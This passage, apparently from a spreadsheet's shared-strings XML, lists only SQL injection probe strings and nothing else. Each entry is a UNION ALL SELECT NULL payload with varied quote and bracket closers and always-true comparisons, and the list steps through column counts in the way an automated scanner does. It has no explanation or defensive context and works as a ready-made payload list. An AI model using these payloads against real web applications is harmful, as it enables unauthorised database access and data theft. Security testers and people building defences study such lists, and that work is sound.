    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "JtEm" = "JtEm</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "tgLt" = "tgLt</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "SNYA" = "SNYA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "HxiN" = "HxiN</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "FYVp" = "FYVp</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "FVOD" = "FVOD</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL-- AND "fxaB" = "fxaB</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND "giqg" = "giqg</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND "QTVP" = "QTVP</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Bfmb" = "Bfmb</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "WWNY" = "WWNY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "przL" = "przL</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "nKwX" = "nKwX</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL-- AND  ( "IiAr" LIKE "IiAr</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND  ( "ilAP" LIKE "ilAP</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND  ( "cjjL" LIKE "cjjL</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "lsFR" LIKE "lsFR</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "kLqV" LIKE "kLqV</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "MQWa" LIKE "MQWa</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "SHSD" LIKE "SHSD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "mbVi" LIKE "mbVi</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL-- AND   (  (  "sBTE" LIKE "sBTE</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (  "hXLk" LIKE "hXLk</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (  "LMXE" LIKE "LMXE</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "JHuZ" LIKE "JHuZ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "uMXe" LIKE "uMXe</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "wjmP" LIKE "wjmP</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "PFvQ" LIKE "PFvQ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "CdkV" LIKE "CdkV</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL-- AND   (  (   ( "cyAH" LIKE "cyAH</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL-- AND   (  (   ( "BQfX" LIKE "BQfX</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (   ( "CPjo" LIKE "CPjo</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "Ygcw" LIKE "Ygcw</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ajQx" LIKE "ajQx</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "laNl" LIKE "laNl</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "nvsG" LIKE "nvsG</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "pIxk" LIKE "pIxk</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "HcZx" LIKE "HcZx</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL-- AND "oEwN" LIKE "oEwN</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL-- AND "pxho" LIKE "pxho</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND "ZElH" LIKE "ZElH</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND "Ktda" LIKE "Ktda</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "kidY" LIKE "kidY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "UcDz" LIKE "UcDz</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "LGzs" LIKE "LGzs</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Jkkf" LIKE "Jkkf</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>" UNION ALL SELECT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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 331 = 331</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 8422 = 8422</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 486 = 486</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3268 = 3268</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 5250 = 5250</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 2037 = 2037</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 4127 = 4127</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 7439 = 7439</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 8186 = 8186</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 7278 = 7278</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  9355 = 9355</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  6913 = 6913</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  5999 = 5999</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  6851 = 6851</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  9062 = 9062</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  7436 = 7436</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  6080 = 6080</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  7944 = 7944</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  293 = 293</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  548 = 548</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 270 = 270</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 4913 = 4913</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 6741 = 6741</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 7120 = 7120</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 720 = 720</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 4876 = 4876</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 5321 = 5321</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 166 = 166</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 3449 = 3449</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 8938 = 8938</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ZTGZ' = 'ZTGZ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'hsYq' = 'hsYq</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'lGcn' = 'lGcn</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'xxHV' = 'xxHV</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'PbCg' = 'PbCg</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'HpwZ' = 'HpwZ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'imLy' = 'imLy</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'sygX' = 'sygX</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Omom' = 'Omom</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'NBnd' = 'NBnd</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'KpuO' = 'KpuO</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'hJTz' = 'hJTz</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'zrGF' = 'zrGF</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'zTQg' = 'zTQg</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'DdtX' = 'DdtX</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'pxlv' = 'pxlv</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'QDOh' = 'QDOh</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'hhZA' = 'hhZA</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'sCTo' = 'sCTo</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'ukfh' = 'ukfh</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'eYIP' = 'eYIP</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'QCFA' = 'QCFA</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'bvqX' = 'bvqX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'TqXP' = 'TqXP</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'xzvN' = 'xzvN</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'ACWH' = 'ACWH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'ZUtM' = 'ZUtM</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'ShmZ' = 'ShmZ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'TJyE' = 'TJyE</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'JZpH' = 'JZpH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'mcki' = 'mcki</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'hBmp' = 'hBmp</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'YsqD' = 'YsqD</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Nysz' = 'Nysz</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'bEfm' = 'bEfm</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'MLWK' = 'MLWK</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'SLTu' = 'SLTu</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'ORsF' = 'ORsF</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'rmUi' = 'rmUi</t>
  </si>
  <si>
